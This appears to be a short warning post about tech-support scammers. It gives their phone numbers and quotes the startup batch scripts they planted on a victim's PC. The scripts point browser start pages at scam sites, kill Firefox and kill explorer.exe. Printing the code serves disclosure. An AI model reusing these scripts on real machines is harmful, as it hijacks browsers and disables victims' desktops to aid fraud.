These guys are very nasty scammers, horrible people. They disable explorer.exe by putting bat files and a VBS file in startup with the code included below.

Numbers: 315-215-0387 - 844-662-8777

Startup1:

cd “C:\Windows\System32”

@echo off

Go to Begin

@echo off

REG ADD “HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F

@echo off

REG ADD “HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F

@echo off

REG ADD “HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F

taskkill /im firefox.exe* /f

cd /D “C:\Users\ojha\AppData\Roaming\Mozilla\Firefox\Profiles”

cd *.default

set ffile=C:\Users\ojha\Start Menu\Programs\Startup

echo user_pref(“browser.startup.homepage”, “http://support16.com/google.html”);

set ffile=

cd C:\WINDOWS

javascript:(function(){ window.location.href=‘http://support16.com/google.html’;})();

Startup2:

taskkill /f /IM explorer.exe

Startup1vbs: